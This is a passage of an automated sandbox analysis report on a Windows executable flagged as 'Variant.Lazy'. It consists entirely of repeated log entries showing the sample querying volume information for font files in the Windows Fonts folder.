                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
